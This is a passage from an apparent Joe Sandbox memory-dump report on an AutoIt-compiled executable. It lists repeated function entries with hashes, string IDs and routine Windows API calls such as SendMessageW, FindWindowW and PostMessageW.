                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 3850602802-1403004172
                                                        • Opcode ID: 1205305906dc07c80e274e1eeab8d8826d23ee0de64494ec5ac7ce5faecd1585
                                                        • Instruction ID: c73e7d642bbddeee844f1e15aa76addedb0bf58b5d29a17db8eeeebdf677d598
                                                        • Opcode Fuzzy Hash: 1205305906dc07c80e274e1eeab8d8826d23ee0de64494ec5ac7ce5faecd1585
                                                        • Instruction Fuzzy Hash: 30018F71642108AFCB44EBA4D952BFE73E89F05344B206029B606B3191EB509E1887A5
                                                        APIs
                                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E7B76C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 3850602802-1403004172
                                                        • Opcode ID: 230f8ea31b53bddd1210e0f2421c552873f8f7404f8cf9029f37a79860bbd3fb
                                                        • Instruction ID: 55ddd6d2da130e3ef1873862c7c3912ac883467382be4e4e4d9e72b3dbc63e25
                                                        • Opcode Fuzzy Hash: 230f8ea31b53bddd1210e0f2421c552873f8f7404f8cf9029f37a79860bbd3fb
                                                        • Instruction Fuzzy Hash: B601D171642108ABCB04EBA4DD03FFE73EC9F05344F60612AF90AB3192EB605E1987B5
                                                        APIs
                                                        • LoadImageW.USER32(00E40000,00000063,00000001,00000010,00000010,00000000), ref: 00E44048
                                                        • EnumResourceNamesW.KERNEL32(00000000,0000000E,00E867E9,00000063,00000000,75A90280,?,?,00E43EE1,?,?,000000FF), ref: 00EB41B3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: EnumImageLoadNamesResource
                                                        • String ID: >
                                                        • API String ID: 1578290342-260571596
                                                        • Opcode ID: 9867a21769a472ece51897414c97043b44a1bafc2b466db37234e6997636f83b
                                                        • Instruction ID: 61ccfc75890cdf7e6f15b4ad965ae4ac02fbc9ff055bec67467ad1e877fd3abb
                                                        • Opcode Fuzzy Hash: 9867a21769a472ece51897414c97043b44a1bafc2b466db37234e6997636f83b
                                                        • Instruction Fuzzy Hash: 0EF06D71744318BBE2204B1ABC4AFD23AADB708BB5F10011AF214AA1E0D2F19480AAA0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: ClassName_wcscmp
                                                        • String ID: #32770
                                                        • API String ID: 2292705959-463685578
                                                        • Opcode ID: 7d2d956cd858ae60cbd7d575550134df64e0b075fdff251d71ba8093c331f346
                                                        • Instruction ID: 5261ea85e2064534fab5c30cd7818293e54450f95d74c36fb9760cff175bef38
                                                        • Opcode Fuzzy Hash: 7d2d956cd858ae60cbd7d575550134df64e0b075fdff251d71ba8093c331f346
                                                        • Instruction Fuzzy Hash: 5AE092776043282BD710EAA5AC49E9BFBACAB51764F01006AB919F3041D670E605C7D4
                                                        APIs
                                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E7A63F
                                                          • Part of subcall function 00E613F1: _doexit.LIBCMT ref: 00E613FB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: Message_doexit
                                                        • String ID: AutoIt$Error allocating memory.
                                                        • API String ID: 1993061046-4017498283
                                                        • Opcode ID: b94018c4694fd07997d6d429d1aa207cddbcfddfe3586d20fa3955bfa2c68ecf
                                                        • Instruction ID: 054b973c6201aa09a5bbff72fb575f728d2a27fe24169d6225197d0238f2d577
                                                        • Opcode Fuzzy Hash: b94018c4694fd07997d6d429d1aa207cddbcfddfe3586d20fa3955bfa2c68ecf
                                                        • Instruction Fuzzy Hash: E0D02B323C431837C2103AA83C07FC8358C8B04B96F086036FB0CB65C249D3894041D9
                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(?), ref: 00EBACC0
                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 00EBAEBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: DirectoryFreeLibrarySystem
                                                        • String ID: WIN_XPe
                                                        • API String ID: 510247158-3257408948
                                                        • Opcode ID: f4951b272b784669a57c8da654dc376ffbf3ee4412c17aab66257a833f9879ca
                                                        • Instruction ID: 0c8c834d742d321afef40ff3590e2e50b8857854af798775dd2b17a25d2073ed
                                                        • Opcode Fuzzy Hash: f4951b272b784669a57c8da654dc376ffbf3ee4412c17aab66257a833f9879ca
                                                        • Instruction Fuzzy Hash: B1E06570C04109DFCF11DBA5DD449EDFBB8AB48301F1C90A2E102B2160D7714A44DF31
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EA86E2
                                                        • PostMessageW.USER32(00000000), ref: 00EA86E9
                                                          • Part of subcall function 00E87A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E87AD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: 0ae7ccdb692909194a1d3c45b10937be4e0be34bae35f7c8c125476b019edfa7
                                                        • Instruction ID: b4f117db3acc46924e9a6feeee6145758458fed8f4f8411c36a6a48e682c4f6c
                                                        • Opcode Fuzzy Hash: 0ae7ccdb692909194a1d3c45b10937be4e0be34bae35f7c8c125476b019edfa7
                                                        • Instruction Fuzzy Hash: 5FD0A931388318ABE22863B09C0BFC6BA089B48B20F100825B34ABA1C0C8A2E940C714
                                                        APIs
                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EA86A2
                                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00EA86B5
                                                          • Part of subcall function 00E87A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E87AD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2086616449.0000000000E41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                                        • Associated: 00000000.00000002.2086599219.0000000000E40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000ECD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086673542.0000000000EEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086720360.0000000000EFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2086740547.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_e40000_Fi#U015f.jbxd
                                                        Similarity
                                                        • API ID: FindMessagePostSleepWindow
                                                        • String ID: Shell_TrayWnd
                                                        • API String ID: 529655941-2988720461
                                                        • Opcode ID: f9aaeaa4c7f376c1bb221df647ff26179b04323c761b834bc4c979225881dc1d
                                                        • Instruction ID: 9f3f67aa09ec2b1c37dfc8eed690a63a39b40b19136bd3b54db22c3ad7c146f9
                                                        • Opcode Fuzzy Hash: f9aaeaa4c7f376c1bb221df647ff26179b04323c761b834bc4c979225881dc1d
                                                        • Instruction Fuzzy Hash: D7D02231388318BBE22873B09C0BFC6BA089B44B20F100835B34EBA1C0C8F2E940C710